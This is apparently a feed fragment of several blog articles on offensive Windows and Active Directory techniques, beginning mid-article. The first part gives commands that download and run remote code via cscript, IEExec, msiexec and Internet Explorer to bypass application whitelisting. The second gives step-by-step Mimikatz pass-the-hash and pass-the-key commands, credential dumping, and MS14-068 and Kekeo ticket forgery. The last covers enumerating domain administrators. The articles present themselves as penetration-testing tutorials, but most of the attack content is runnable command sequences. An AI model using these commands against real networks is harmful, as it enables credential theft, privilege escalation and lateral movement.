&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript /b C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\P&lt;/span&gt;rinting_Admin_Scripts&lt;span class="se"&gt;\z&lt;/span&gt;h-CN&lt;span class="se"&gt;\p&lt;/span&gt;ubprn.vbs 127.0.0.1 script:&amp;lt;https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  13. Native Windows copy Command
&lt;/h2&gt;

&lt;p&gt;The built-in &lt;code&gt;copy&lt;/code&gt; and &lt;code&gt;xcopy&lt;/code&gt; commands can copy files from remote SMB shares.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;copy &lt;span class="se"&gt;\\&lt;/span&gt;x.x.x.x&lt;span class="se"&gt;\x&lt;/span&gt;x&lt;span class="se"&gt;\p&lt;/span&gt;oc.exe
xcopy d:&lt;span class="se"&gt;\t&lt;/span&gt;est.exe &lt;span class="se"&gt;\\&lt;/span&gt;x.x.x.x&lt;span class="se"&gt;\t&lt;/span&gt;est.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)
&lt;/h2&gt;

&lt;p&gt;Internet Explorer can be launched from the command line to access a remote URL, potentially triggering a vulnerability.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="s2"&gt;"C:&lt;/span&gt;&lt;span class="se"&gt;\P&lt;/span&gt;&lt;span class="s2"&gt;rogram Files&lt;/span&gt;&lt;span class="se"&gt;\I&lt;/span&gt;&lt;span class="s2"&gt;nternet Explorer&lt;/span&gt;&lt;span class="se"&gt;\I&lt;/span&gt;&lt;span class="s2"&gt;EXPLORE.EXE"&lt;/span&gt; &amp;lt;http://site.com/exp&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  15. IEExec Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;IEExec.exe&lt;/code&gt;, part of the .NET Framework, can execute managed code from remote locations.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&amp;gt; caspol &lt;span class="nt"&gt;-s&lt;/span&gt; off
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&amp;gt; IEExec &amp;lt;http://site.com/files/test64.exe&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/" rel="noopener noreferrer"&gt;https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  16. msiexec Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;msiexec&lt;/code&gt; installer can execute MSI packages hosted on remote servers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msiexec /q /i &amp;lt;http://site.com/payloads/calc.png&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  17. GreatSCT Download and Execution Project
&lt;/h2&gt;

&lt;p&gt;GreatSCT is a project that provides various techniques for bypassing application whitelisting and executing payloads.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://github.com/GreatSCT" rel="noopener noreferrer"&gt;https://github.com/GreatSCT&lt;/a&gt;&lt;/p&gt;

</description>
      <category>windows</category>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Domain Lateral Movement: PTH, PTK, and PTT Hash-Based Credential Transfer</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 11:09:24 +0000</pubDate>
      <link>https://dev.to/excalibra/domain-lateral-movement-pth-ptk-and-ptt-hash-based-credential-transfer-313c</link>
      <guid>https://dev.to/excalibra/domain-lateral-movement-pth-ptk-and-ptt-hash-based-credential-transfer-313c</guid>
      <description>&lt;p&gt;&lt;strong&gt;Abstract:&lt;/strong&gt; This article delineates the operational workflow of the Kerberos protocol within a domain environment, including the process by which a client obtains a Ticket-Granting Ticket (TGT) and its significance in intranet security. It critically examines three lateral movement techniques—Pass the Hash (PTH), Pass the Ticket (PTT), and Pass the Key (PTK)—and evaluates the ramifications of NTLM and LM Hash authentication on Windows systems. The discussion extends to the security patch KB2871997, designed to mitigate PTH attacks. Through case studies, the utilisation of the Mimikatz tool for credential extraction and injection is demonstrated, alongside an analysis of the MS14-068 vulnerability and the concepts of Golden and Silver Tickets. The practical application of the Ladon intranet penetration testing framework for information gathering and lateral movement is also considered.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9od7m10riqpp0uk2t7xk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9od7m10riqpp0uk2t7xk.png" alt=" " width="800" height="589"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fled1zd7l7dn4zfxa6reu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fled1zd7l7dn4zfxa6reu.png" alt=" " width="720" height="359"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Kerberos Protocol Workflow
&lt;/h3&gt;

&lt;p&gt;The Kerberos protocol operates within a domain context according to the following simplified procedure:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The client machine computes an NTLM hash of the user's plaintext password and encrypts it with a timestamp, utilising the krbtgt password hash as the key. This ciphertext is transmitted to the Key Distribution Centre (KDC), or domain controller. The KDC authenticates the user and subsequently generates a Ticket-Granting Ticket (TGT). The TGT's cryptographic signature is returned to the client; within the Kerberos framework, the TGT data can only be deciphered by the domain user krbtgt.&lt;/li&gt;
&lt;li&gt;Subsequently, the client presents the TGT to the KDC to request a Ticket-Granting Service (TGS) ticket. The KDC validates the submitted TGT. Upon successful verification, it encrypts the target service account's NTLM hash and the TGT, returning the resultant ciphertext to the client.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The following definitions distinguish the three credential transfer techniques:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PTH (Pass the Hash):&lt;/strong&gt; A penetration testing method conducted using the value of the &lt;strong&gt;LM or NTLM hash&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTT (Pass the Ticket):&lt;/strong&gt; A penetration test performed by utilising the &lt;strong&gt;TGT credentials&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTK (Pass the Key):&lt;/strong&gt; A penetration test executed using the &lt;strong&gt;ekeys AES256 hash&lt;/strong&gt; (this key material can be obtained via the &lt;code&gt;sekurlsa::ekeys&lt;/code&gt; command within Mimikatz).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;On Authentication Hashes:&lt;/strong&gt;&lt;br&gt;
Windows operating systems utilise two primary hashing algorithms: LM Hash and NTLM Hash. For personal systems running Windows Vista or later, and server systems from Windows Server 2003 onwards, the standard authentication method is exclusively NTLM Hash.&lt;/p&gt;

&lt;p&gt;A ticket may be conceptualised as analogous to a cookie deposited upon login to a website, or a persistent credential established between a computer and a remote entity. This ticket can subsequently be reused to re-establish a connection, functioning precisely like a session cookie. While PTH and PTK utilise identical connection protocols, PTT operates distinctly via the Kerberos protocol.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PTH Mechanism:&lt;/strong&gt;&lt;br&gt;
PTH constitutes a classic attack vector in intranet penetration. Its operational principle permits an attacker to remotely access a host or service by leveraging the LM Hash and NTLM Hash values, without necessitating the corresponding plaintext password. &lt;em&gt;In essence, it suffices to acquire the encrypted hash value to mount an attack; the plaintext password is not required.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The attack landscape is nuanced. If NTLM authentication is disabled, the tool PsExec cannot establish a remote connection using the obtained NTLM hash; however, Mimikatz can still facilitate a successful attack. On specific operating systems—8.1/2012r2, and upon installation of Win 7/2008r2/8/2012 with patch KB2871997—&lt;strong&gt;AES keys may substitute for the NT hash to execute a PTK attack.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Summary: Impact of the KB2871997 Patch (systeminfo can verify patch installation)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PTH:&lt;/strong&gt; On unpatched systems, any user can connect. Post-patch, only the built-in Administrator account connection is permitted.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTK:&lt;/strong&gt; The patch enables connections using the AES256 key for any user.&lt;/li&gt;
&lt;li&gt;Refer to: &lt;em&gt;Does KB2871997 truly defend against PTH attacks? - FreeBuf Cybersecurity Industry Portal&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Nature of PTT Attacks:&lt;/strong&gt;&lt;br&gt;
The PTT attack modality diverges from simple NTLM authentication. It is an attack leveraging the Kerberos protocol. Three prevalent attack methodologies are introduced here: the MS14-068 exploit, Golden Ticket, and Silver Ticket. Succinctly, these methods function by injecting a forged yet legitimate ticket into system memory to achieve a connection.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MS14-068 Vulnerability:&lt;/strong&gt; An elevation of privilege vulnerability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket &amp;amp; Silver Ticket:&lt;/strong&gt; These are categorised as &lt;strong&gt;persistence and privilege maintenance techniques&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The MS14-068 vulnerability is hazardous because it enables any ordinary domain user to elevate their privileges to domain administrator. Microsoft's corrective patch is KB3011780.&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Technique Summaries
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTH Transfer - Mimikatz&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTK Transfer - Mimikatz&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTT Transfer - MS14-068 &amp;amp; Kekeo &amp;amp; Local Tickets&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domestic Ladon Intranet Penetration Framework Testing - Information Gathering, Connectivity, etc.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6g8rkt1usdkgm8f2r34.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6g8rkt1usdkgm8f2r34.png" alt=" " width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  Case Study 1: Domain Lateral Movement via PTH Transfer - Mimikatz
&lt;/h2&gt;

&lt;p&gt;This method, Pass the Hash, operates by discovering the password hash value (typically the NTLM hash) associated with an account. In a domain environment, where most computers are logged onto by domain users, a significant number of machines share an identical local administrator password set during installation. Consequently, if the local administrator credentials are uniform, an attacker can utilise a hash passing technique to log into other machines across the intranet. The critical advantage for the attacker is circumventing the computationally expensive and time-consuming process of cracking the password hash to reveal the plaintext.&lt;/p&gt;

&lt;p&gt;Mimikatz serves as the instrumental tool for PTH, functioning not only as a credential harvester and plaintext password extractor but also as an attack platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PTH NTLM Transfer Commands:&lt;/strong&gt;&lt;br&gt;
For unpatched workgroup and domain connections:&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7&lt;/code&gt; (Assuming knowledge of the domain controller hash)&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad458a5695dc997aa02d455c&lt;/code&gt; (workgroup designates a local user connection)&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad217334fe7&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Target example: \OWA2010CN-God.god.org (Domain Controller)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Experimental Demonstration:&lt;/strong&gt;&lt;br&gt;
Execute the following sequence within an elevated PowerShell console on a 2008R2 x64 web server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Command sequence:
privilege::debug
sekurlsa::logonPasswords (to extract plaintext passwords)
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 (Mimikatz will spawn a new command prompt window upon execution)
In the newly spawned window, execute: dir \\192.168.3.21\c$ (if the IP address is not resolvable, substitute the target's hostname)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Case Study 2: Domain Lateral Movement via PTK Transfer - Mimikatz
&lt;/h2&gt;

&lt;p&gt;This method utilises the AES256 key.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Commands for Patched Workgroup and Domain Connections:&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;sekurlsa::ekeys&lt;/code&gt; # retrieves the AES key material&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:mary /domain:god /aes256:d7c110753a2f7f240e5b2701dc1d16a16e40af3c5cdf814781c4b&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Crucially, for a PTK attack to succeed for a non-administrator user, the target system must have the KB2871997 patch installed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh4cg4keu31xahutfyphl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh4cg4keu31xahutfyphl.png" alt=" " width="800" height="348"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Case Study 3: Domain Lateral Movement via PTT Transfer - MS14-068 &amp;amp; Kekeo &amp;amp; Local Tickets
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;First Method: Exploiting the MS14-068 Vulnerability&lt;/strong&gt;&lt;br&gt;
This technique enables an ordinary domain user to directly obtain domain controller system privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Procedure for MS14-068 via PowerShell:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Ascertain the current Security Identifier (SID):&lt;/strong&gt; &lt;code&gt;whoami /user&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Credential Management:&lt;/strong&gt;
&lt;code&gt;mimikatz # kerberos::purge&lt;/code&gt; // Purges all existing credentials on the current machine, as lingering domain member certificates can interfere with ticket forgery.
&lt;code&gt;mimikatz # kerberos::list&lt;/code&gt; // Inspect current machine certificates.
&lt;code&gt;mimikatz # kerberos::ptc &amp;lt;ticket_filename&amp;gt;&lt;/code&gt; // Inject a generated ticket into memory.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Generate TGT Data via MS14-068:&lt;/strong&gt;
&lt;code&gt;ms14-068.exe -u &amp;lt;DomainMember&amp;gt;@&amp;lt;domain&amp;gt; -s &amp;lt;sid&amp;gt; -d &amp;lt;domain_controller_address&amp;gt; -p &amp;lt;domain_member_password&amp;gt;&lt;/code&gt;
&lt;em&gt;Example:&lt;/em&gt; &lt;code&gt;MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-21573346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Inject the Forged Ticket into Memory:&lt;/strong&gt;
&lt;code&gt;mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Verify Credential Cache:&lt;/strong&gt; &lt;code&gt;klist&lt;/code&gt; (Displays current connections; use &lt;code&gt;klist purge&lt;/code&gt; to delete tickets).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Leverage the Access:&lt;/strong&gt;
&lt;code&gt;dir \\192.168.3.21\c$&lt;/code&gt; (or &lt;code&gt;net use&lt;/code&gt; for connection; if IP fails, use the hostname).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The principle of this ticket passing attack lies in generating a syntactically correct connection request and importing it into memory via Mimikatz, thereby obviating the need for a password during the connection phase.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Second Method: Utilising the Kekeo Tool&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Generate the Ticket:&lt;/strong&gt;
&lt;code&gt;kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a5dc997aa02d45c"&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Import the Ticket:&lt;/strong&gt;
&lt;code&gt;kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Verify Credential Cache:&lt;/strong&gt; &lt;code&gt;klist&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Establish Connection:&lt;/strong&gt;
&lt;code&gt;dir \\192.168.3.21\c$&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Third Method: Exploiting Local Tickets (Requires Local Administrator Privileges)&lt;/strong&gt;&lt;br&gt;
This method essentially involves the harvesting and reuse of valid, pre-existing session cookies. The initial step is to use Mimikatz to export local tickets and subsequently import them into memory.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Command Sequence:&lt;/strong&gt;
&lt;code&gt;sekurlsa::tickets /export&lt;/code&gt;
&lt;code&gt;kerberos::ptt xxxxxxxxx.xxx.kirbi&lt;/code&gt; (This action retrieves the previously stored "cookie" and tests its validity; credentials remain valid for a 10-hour window).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; PTT delivery does not mandate local administrator privileges. Connections should be established using the hostname. The technique is predicated upon known vulnerabilities, dedicated tools, or the harvesting of locally cached tickets.&lt;/p&gt;




&lt;h2&gt;
  
  
  Case Study 4: The Ladon Intranet Penetration Framework - Testing and Validation
&lt;/h2&gt;

&lt;p&gt;This section covers the practical application of Ladon for Information Gathering, Protocol Scanning, Vulnerability Probing, and Credential Passing Attacks.&lt;/p&gt;

&lt;p&gt;Ladon functions as a large-scale intranet penetration scanner, often used in conjunction with Cobalt Strike. Ladon version 8.9 incorporates 120 built-in modules for tasks including information gathering, live host detection, port scanning, service identification, password spraying, vulnerability detection, and vulnerability exploitation. Vulnerability detection encompasses MS17-010 (EternalBlue), SMBGhost, WebLogic, ActiveMQ, Tomcat, and Struts2. Password spraying targets databases (MySQL, Oracle, MSSQL), remote access protocols (FTP, SSH for Linux, VNC), and Windows services (IPC, WMI, SMB, NetBIOS, LDAP, SmbHash, WmiHash, WinRM). Remote command execution supports multiple methods (smbexec, wmiexec, psexec, atexec, sshtexec) and exploitation frameworks (e.g., sshell, Webshell). Version X-4.0 and subsequent iterations are discussed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Resources:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Ladon Repository: &lt;code&gt;https://github.com/k8gege/Ladon&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Kekeo Releases: &lt;code&gt;https://github.com/gentilkiwi/kekeo/releases&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;MS14-068 Exploit: &lt;code&gt;https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>domain</category>
      <category>cybersecurity</category>
      <category>offensive</category>
      <category>credential</category>
    </item>
    <item>
      <title>Rapid Identification of Domain Administrators and Domain Controllers in Internal Network Penetration Testing</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 09:13:56 +0000</pubDate>
      <link>https://dev.to/excalibra/rapid-identification-of-domain-administrators-and-domain-controllers-in-internal-network-24k5</link>
      <guid>https://dev.to/excalibra/rapid-identification-of-domain-administrators-and-domain-controllers-in-internal-network-24k5</guid>
      <description>&lt;p&gt;In the process of internal network penetration testing, the ability to rapidly identify Domain Administrators and Domain Controllers is of paramount importance. Several commonly employed methods are introduced below.&lt;/p&gt;

&lt;h2&gt;
  
  
  Locating Domain Administrators
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Command Line Identification
&lt;/h3&gt;

&lt;p&gt;The following command can be executed in the command prompt to query domain administrator accounts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net group "Domain Admins" /domain            //Query Domain Administrators
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ckha3bhx0fbbrvdddhq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ckha3bhx0fbbrvdddhq.png" alt="Figure 2: AV detection results for executables with embedded shellcode" width="800" height="310"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 1: Output of the net group command listing Domain Administrators.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Tool-Based Identification
&lt;/h3&gt;

&lt;p&gt;Several specialised tools can facilitate the enumeration of Domain Administrator accounts and their logged-on locations.&lt;/p&gt;

&lt;h4&gt;
  
  
  PSLoggedon.exe
&lt;/h4&gt;

&lt;p&gt;This utility identifies users logged on to a system by examining the registry key &lt;code&gt;HKEY_USERS&lt;/code&gt; and utilising the &lt;code&gt;NetSessionEnum&lt;/code&gt; API. Note that certain functionalities of this tool require elevated, administrator-level privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon&lt;/code&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays supported options and units of measurement for output values.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-l&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Shows only local logons, excluding local and network resource logons.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-x&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Does not display logon times.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\computername&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specifies the name of the computer for which logon information is to be listed.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;username&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specifies a user name to search for across the network for machines where that user is logged on.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;To locate a specific user, such as 'Administrator', the tool is invoked as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PsLoggedon.exe Administrator
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzmbputd5riz7z41aflxz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzmbputd5riz7z41aflxz.png" alt="Figure 2: Enumeration results showing machines where the Administrator user has logged on." width="799" height="215"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 2: Enumeration results showing machines where the Administrator user has logged on.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;To query a specific machine, the command is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PsLoggedon.exe \AD-server
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7mze0gyv435ymj0yu295.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7mze0gyv435ymj0yu295.png" alt="Figure 3: Output displaying users currently logged on to the machine AD-server." width="571" height="208"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 3: Output displaying users currently logged on to the machine AD-server.
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  PVefindaduser.exe
&lt;/h4&gt;

&lt;p&gt;This tool is designed to ascertain the logon locations of Active Directory users, enumerate domain users, and identify users logged on to specific computers, including local users, those connected via RDP, and accounts used to run services and scheduled tasks. This tool also requires administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn&lt;/code&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-h&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays help information.&lt;/td&gt;
